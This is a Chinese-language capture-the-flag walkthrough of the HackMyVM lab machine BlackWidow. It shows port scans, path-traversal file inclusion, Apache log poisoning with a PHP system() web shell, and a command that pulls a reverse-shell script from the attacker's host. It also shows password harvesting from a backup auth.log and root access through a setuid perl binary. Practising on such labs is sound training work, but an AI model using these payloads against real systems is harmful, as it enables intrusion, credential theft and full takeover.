打靶记录(一零零)之HMVBlackWidow

所渗透的靶机IP为192.168.56.129

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:10 UTC
Nmap scan report for 192.168.56.129
Host is up (0.00043s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
3128/tcp  open  squid-http
36483/tcp open  unknown
45041/tcp open  unknown
51739/tcp open  unknown
52757/tcp open  unknown
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds

sudo nmap -sT -sV -sC -O -p22,80,111,2049,3128,36483,45041,51739,52757 192.168.56.129    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:11 UTC
Nmap scan report for 192.168.56.129
Host is up (0.00027s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)
|   256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)
|_  256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)
80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      49091/udp6  mountd
|   100005  1,2,3      50150/udp   mountd
|   100005  1,2,3      51563/tcp6  mountd
|   100005  1,2,3      51739/tcp   mountd
|   100021  1,3,4      36483/tcp   nlockmgr
|   100021  1,3,4      43921/tcp6  nlockmgr
|   100021  1,3,4      54610/udp   nlockmgr
|   100021  1,3,4      55575/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs        3-4 (RPC #100003)
3128/tcp  open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
36483/tcp open  nlockmgr   1-4 (RPC #100021)
45041/tcp open  mountd     1-3 (RPC #100005)
51739/tcp open  mountd     1-3 (RPC #100005)
52757/tcp open  mountd     1-3 (RPC #100005)
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.10 seconds

sudo nmap --script=vuln -p22,80,111,2049,3128,36483,45041,51739,52757 192.168.56.129      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:13 UTC
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.129
Host is up (0.00018s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /company/: Potentially interesting folder
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
111/tcp   open  rpcbind
2049/tcp  open  nfs
3128/tcp  open  squid-http
36483/tcp open  unknown
45041/tcp open  unknown
51739/tcp open  unknown
52757/tcp open  unknown
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.01 seconds

Getshell

访问80端口，扫描目录有一个/company目录，但是加载不出来，应该需要域名解析，右键查看源码，添加blackwidow到hosts。

company根目录只是一个门户网站，扫描一下目录

gobuster dir -u http://blackwidow/company/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,php,html,bak 
===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================

[+] Url:                     http://blackwidow/company/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,sql,txt,php,html,bak,rar

[+] Timeout:                 10s
===============================================================

Starting gobuster in directory enumeration mode
===============================================================

/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 42271]
/.html                (Status: 403) [Size: 275]
/assets               (Status: 301) [Size: 317] [--> http://blackwidow/company/assets/]
/forms                (Status: 301) [Size: 316] [--> http://blackwidow/company/forms/]
/changelog.txt        (Status: 200) [Size: 1175]
/Readme.txt           (Status: 200) [Size: 222]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/started.php          (Status: 200) [Size: 42271]

Progress: 1764480 / 1764488 (100.00%)
===============================================================

Finished
===============================================================

在源码中还有一句

We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

也许某个界面存在文件包含

尝试started.php

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../etc/passwd"


* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
> < HTTP/1.1 200 OK
> < Date: Sun, 25 Feb 2024 04:33:47 GMT
> < Server: Apache/2.4.38 (Debian)
> < Vary: Accept-Encoding
> < Content-Length: 1582
> < Content-Type: text/html; charset=UTF-8
> < 
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
> systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
> systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
> systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
> messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
> avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
> sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
> systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
> viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
> _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
> statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin

* Connection #0 to host blackwidow left intact

发现确实存在!

基本上就是日志中毒了

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log" 
* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
> < HTTP/1.1 200 OK
> < Date: Sun, 25 Feb 2024 04:41:52 GMT
> < Server: Apache/2.4.38 (Debian)
> < Vary: Accept-Encoding
> < Content-Length: 426
> < Content-Type: text/html; charset=UTF-8
> < 
> 192.168.56.102 - - [24/Feb/2024:23:40:48 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/8.5.0"
> 192.168.56.102 - - [24/Feb/2024:23:41:05 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

* Connection #0 to host blackwidow left intact

的确是可以读取日志

curl -v "http://blackwidow/" -A "<?php system(\$_GET['shell']); ?>"

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=whoami" 
* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=whoami HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
> < HTTP/1.1 200 OK
> < Date: Sun, 25 Feb 2024 04:44:01 GMT
> < Server: Apache/2.4.38 (Debian)
> < Vary: Accept-Encoding
> < Content-Length: 698
> < Content-Type: text/html; charset=UTF-8
> < 
> 192.168.56.102 - - [24/Feb/2024:23:40:48 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/8.5.0"
> 192.168.56.102 - - [24/Feb/2024:23:41:05 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
> 192.168.56.102 - - [24/Feb/2024:23:41:52 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 598 "-" "curl/8.5.0"
> 192.168.56.102 - - [24/Feb/2024:23:43:32 -0500] "GET / HTTP/1.1" 200 334 "-" "www-data
> "

* Connection #0 to host blackwidow left intact

可以进行命令执行!

提权

从本地上传一个反弹shell，访问触发

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=curl%20http://192.168.56.102/reverseshell.php%20-o%20shell.php%20&&%20chmod%20+x%20shell.php%0A%0A"

还有一个viper用户，尝试在/var/目录找敏感文件

/var/backups/auth.log竟然是可读的

找到一段

Dec 12 16:56:24 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:29 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:32 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:34 test sshd[29558]: error: Received disconnect from 192.168.1.109 port 7088:13: Unable to authenticate [preauth]
Dec 12 16:56:34 test sshd[29558]: Disconnected from authenticating user viper 192.168.1.109 port 7088 [preauth]
Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090

?V1p3r2020!?应该就是viper的密码了

ssh连接

在家目录发现.bash_history是有内容的

切换至~/backup_site/assets/vendor/weapon，有一个arsenic，实际上应该就是一个perl的二进制程序

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

现在我们是root!

碎碎念

还是挺简单的房间吧，都是学过的东西。

第100个靶机!接下来一段时间暂时不会打靶机了:(